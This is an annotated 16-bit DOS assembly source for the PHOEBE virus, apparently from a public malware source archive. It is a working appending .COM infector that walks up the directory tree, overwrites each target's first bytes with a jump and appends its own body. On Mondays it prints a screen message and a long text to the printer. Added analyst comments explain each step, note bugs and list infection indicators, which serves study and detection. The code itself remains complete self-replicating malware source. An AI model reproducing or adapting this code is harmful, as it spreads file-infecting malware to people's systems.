mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-07-03 00:43:34 +00:00
vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.phoebe.asm
2021-01-12 17:55:26 -06:00


;PHOEBE
;coded by Opic of the Codebreakers
;PHOEBE is an appending .com infector with DT via a dotdot routine
;infection criteria is met on a Monday; once all files that are capable of
;being infected by PHOEBE are, a payload is delivered:
;the monitor will print a message to the screen (in French) which
;translates to: "Introducing PHOEBE, she was coded in the heart of midwest
;america in the autumn of nineteen ninety-seven by Opic of The Codebreakers"
;along with a text string which will be printed to the printer. Thanx go
;out to: Spo0ky, Arsonic, and Sea4, without whose help Phoebe would
;not be what she is today. PHOEBE can be assembled using a86 V4.02
;it should be noted that phoebe has no anti-av routines, yet it still
;remains undetectable by most av software. a testament to the inconsistency
;of many av scanners, specifically windows95 scanners.
; Analyst note: host stub and entry point (16-bit DOS .COM, a86 syntax).
; The three bytes below are a placeholder near jump (opcode E9h, zero
; displacement) standing in for the first bytes of a host program in this
; first-generation build.
db 0e9h,0,0 ;jump to virus code..
start_of_PHOEBE:
; call/pop idiom: the call pushes the run-time address of `delta`, the pop
; retrieves it, and subtracting the assemble-time offset leaves in bp the
; displacement between where the code was assembled and where it is running.
; Every later [bp+label] reference depends on this value.
call delta ;get delta offset to get # of byte virus moved down
delta:
pop bp ; call a pop register to get the ip back into register
sub bp,offset delta ; we subtract the offset delta from bp(ip)
; Copy the 3 saved bytes at [bp+buffer] to offset 100h, where a .COM image
; begins in memory, so the host's original first bytes are back in place
; before control is eventually handed to 100h.
mov cx,3
mov di,100h
lea si,[bp+buffer]
rep movsb
jmp find_first ;jump to find the first file
; Analyst note: file search loop.
; Enumerates files matching `filespec` in the current directory, then
; changes to the parent directory via `dotdot` and repeats. When the chdir
; call fails (presumably once the root directory is reached - not shown
; here), control goes to check_payload. Nothing in this listing restores
; the directory the program was started from.
find_first:
; INT 21h AH=4Eh: find first match. CX=7 is the attribute mask (read-only,
; hidden and system bits set); DX points at the search pattern.
mov ah,4eh ;find's first file in the starting directory..
mov cx,7
lea dx,[bp+filespec]
int 21h
; Carry clear means a match was returned in the DTA.
jnc open ;one found.. then infect da
jmp dir_loopy ;otherwise change directory
dir_loopy:
; INT 21h AH=3Bh: change current directory to the path at DX ('..').
lea dx,[bp+dotdot]
mov ah, 3bh ;int for chdir
int 21h
jnc find_first ;find first file in new directory
jmp check_payload ; we finished spreading so we check payload criteria
find_next:
; INT 21h AH=4Fh: continue the search begun by AH=4Eh.
mov ah, 4Fh ;find next..
int 21h
jnc open ;one found.. INFECT IT!
jmp dir_loopy ;otherwise we do a cd..
; Analyst note: infection routine for the file named in the current find
; result. It reads the candidate's first 3 bytes, tests for an existing
; infection, then overwrites those 3 bytes with a near jump and appends the
; body start_of_PHOEBE..end_of_PHOEBE. The carry flag is not tested after
; any INT 21h call in this block, and nothing here saves or restores the
; file's timestamp or attributes.
; Artifacts useful for triage and cleanup, as far as this listing shows:
;   - the file begins with E9h followed by a 16-bit displacement equal to
;     (pre-infection size - 3);
;   - the file grows by (end_of_PHOEBE - start_of_PHOEBE) bytes;
;   - `buffer` is the last item of the appended body, so the host's
;     original first 3 bytes sit in the last 3 bytes of the file.
open:
; INT 21h AX=3D02h: open for read/write. 9Eh is the file-name field of the
; default DTA at 80h (80h + 1Eh); no set-DTA call appears in this listing.
mov ax,3d02h ;open file
mov dx,9eh ;get the info from the dta
int 21h
mov bx,ax                       ; bx = value returned by the open call, used as the handle below
; INT 21h AH=3Fh: read the first 3 bytes of the file into `buffer`.
mov ah,3fh ;read from file
mov cx,3 ;3 bytes
lea dx,[bp+buffer]
int 21h
; Already-infected test: word at 80h+1Ah is the low word of the file size
; in the DTA. If (size - body length - 3) equals the word following the
; first byte, the file is treated as infected and skipped. The first byte
; itself is not compared against E9h.
mov ax,word ptr[80h + 1ah]
sub ax,end_of_PHOEBE - start_of_PHOEBE + 3
cmp ax,word ptr[bp+buffer+1]
je bomb_it_out
; Build the new 3-byte header: displacement = file size - 3, stored after
; the E9h opcode in `new_three`.
mov ax,word ptr[80h + 1ah]
sub ax,3
mov word ptr[bp+new_three+1],ax
; INT 21h AX=4200h: seek to offset 0 from the start of the file.
mov ax,4200h
xor cx,cx
xor dx,dx
int 21h
; INT 21h AH=40h: write the 3-byte jump over the file's first bytes.
mov ah,40h
lea dx,[bp+new_three]
mov cx,3
int 21h
; INT 21h AX=4202h: seek to offset 0 from the end of the file.
mov ax,4202h
xor cx,cx
xor dx,dx
int 21h
; INT 21h AH=40h: append the body, including the just-read host bytes in
; `buffer`.
mov ah,40h
lea dx,[bp+start_of_PHOEBE]
mov cx,end_of_PHOEBE - start_of_PHOEBE
int 21h
jmp bomb_it_out
bomb_it_out: ;closes the file..
; NOTE(review): AH=3Fh is the same function number used for the read
; earlier in this routine, so despite the label and comment this call does
; not appear to close the handle; handles opened here look to stay open.
mov ah,3fh ;close file
int 21h
jmp find_next ;find another..
; Analyst note: payload trigger, payload, and return to host.
; Reached only after the directory walk has ended. The payload shown here
; prints text to the screen and to a printer; no instruction in this block
; deletes or overwrites data.
check_payload:
; INT 21h AH=2Ah: get system date. AL returns the day of week (0 = Sunday),
; so AL = 1 is Monday.
mov ah,2ah ;gets system date
int 21h ;opens it
cmp al,001h ;compares, is it monday?
je payload ; if so, we got shit to do
jmp get_out ; if not then we chill till Mon.
payload:
; INT 21h AH=09h: write the '$'-terminated string starting at `screen`.
mov ah,09h ; Fuction 09h: Print String to standard output
lea dx,screen ; Start of '$' terminated string
int 21h
; INT 17h AH=01h: initialise the printer port selected by DX (0 = first).
mov ah,01h ;begin of printer sect of payload
mov dx,0h
int 17h ;int for initializing printer
lea si,string1
mov cx,String1Len
PrintStr:
; INT 17h AH=00h: send the character in AL to the printer. lodsb fetches
; the next byte of String1 into AL; the loop runs String1Len times.
mov ah,00h
lodsb
int 17h
loop PrintStr
Get_out:
; Transfer control to offset 100h, where the entry code placed the saved
; host bytes, so the host program runs.
lea di,100h
jmp di
; Analyst note: data area. These strings are stored as plain text in the
; appended body; nothing in this listing encrypts or obfuscates them, so
; they are usable as static indicators for this sample.
; Template for the 3-byte near jump written over a target's first bytes;
; the two zero bytes are filled with the displacement at run time.
new_three db 0e9h,0,0
; Search pattern passed to find-first.
filespec db '*.com',0
; Path passed to chdir to move to the parent directory.
dotdot db '..',0
; Screen message: screen, screen2 and screen3 are contiguous, so a single
; AH=09h call starting at `screen` prints all three up to the '$'.
screen db "Voila PHOEBE! Elle etait code' dans la coeur de ,",10,13
screen2 db "l'amerique midwest a l'automne, dix-neuf cent",10,13
screen3 db 'quatre-vingt-dix-sept, par Opic des Codebreakers',10,13,'$'
;You have to have the "$" at the end of all the text you want to print
; Byte count of the printer text, used as the loop count for INT 17h output.
String1Len EQU EndStr1-String1
; Analyst note: text sent to the printer one byte at a time by the payload.
; Each line ends with CR/LF (0Dh,0Ah); the final byte 0Ch is a form feed.
String1 db '*************************PHOEBE*************************',0dh,0ah
db 'Phoebe: high school knockout, better take our MONDAY to',0dh,0ah
db 'the tuesday prize fighter(you were a cab driver off on',0dh,0ah
db 'the distance).youre a runner or a lover:sacred taylor',0dh,0ah
db 'set our records straight one lost two late,im a little',0dh,0ah
db 'off time so set your ticker to mine:',0dh,0ah
db 'id love to have my halo of social grace recrowned.',0dh,0ah
db '(desert island ect.) home to ill will and',0dh,0ah
db 'misrepresentation. barter with me now mexico, i demand',0dh,0ah
db 'it.come bluebeard & red blood-we are life-even in our',0dh,0ah
db 'tied down mishaps. we are life; endure us. dead seven',0dh,0ah
db 'year old run over by a bus while stealing your first',0dh,0ah
db 'and only bicycle; endure. this is life even in my wine',0dh,0ah
db 'glass even in my ever faltering and constant doubt we',0dh,0ah
db 'are here, this is it, endure. even in on our toilet',0dh,0ah
db 'in the morning or in your shitbox or motel, you have',0dh,0ah
db 'made it-rejoice!-the ground will open up on us even',0dh,0ah
db 'before this glass is finished. this year will end for',0dh,0ah
db 'most of us.salt touches the ground, athens have we',0dh,0ah
db 'lost quite yet? savagly speared we went down quietly?',0dh,0ah
db 'giving up our youth or even worse our spirit so',0dh,0ah
db 'daintily as a beauty queen shits at midnight? was no',0dh,0ah
db 'one watching? listening? tell me athens: are we',0dh,0ah
db 'christians and lions? have i got my history all wrong?',0dh,0ah
db 'from the first to the last or one year past: "are these',0dh,0ah
db 'the depths of despair so unevenly documented in its',0dh,0ah
db 'text?".for once athens history repeats itself.tell me',0dh,0ah
db 'what do you think of our football games? are our glory',0dh,0ah
db 'days over? is america doomed with pre-ejaculation? i',0dh,0ah
db 'must know. slap me and tell me im like all the rest,',0dh,0ah
db 'athens,id feel so much better if you did.am i a thief',0dh,0ah
db 'stealing red robed memory? am i: train through a',0dh,0ah
db 'tunnel? rocketship blasting off? the washington',0dh,0ah
db 'monument? i bet i am.i am wimpering under your window',0dh,0ah
db 'sill or whispering to your pillowed ear:rejoice! we are',0dh,0ah
db 'famous watchers.sewer of amber letters, lips sewed a',0dh,0ah
db 'thread of truth to your tongue.i named and numbered my',0dh,0ah
db 'system the whole world over,and you?you got flowers and',0dh,0ah
db 'chocolates.like a steel warehouse summer turned calcium',0dh,0ah
db 'to carbon.',0dh,0ah
db '****coded/copyrighted:Opic*********Codebreakers,1997****',0Ch
; End marker used to compute String1Len.
EndStr1:
; Holds the host's original first 3 bytes. The initial value CDh,20h is an
; INT 20h (terminate program) instruction plus one pad byte, so this
; first-generation build exits when control reaches 100h. Being the last
; item before end_of_PHOEBE, these are the final 3 bytes of the body.
buffer db 0cdh,20h,0
; End of the region whose length is used for the append and for the
; already-infected size test.
end_of_PHOEBE: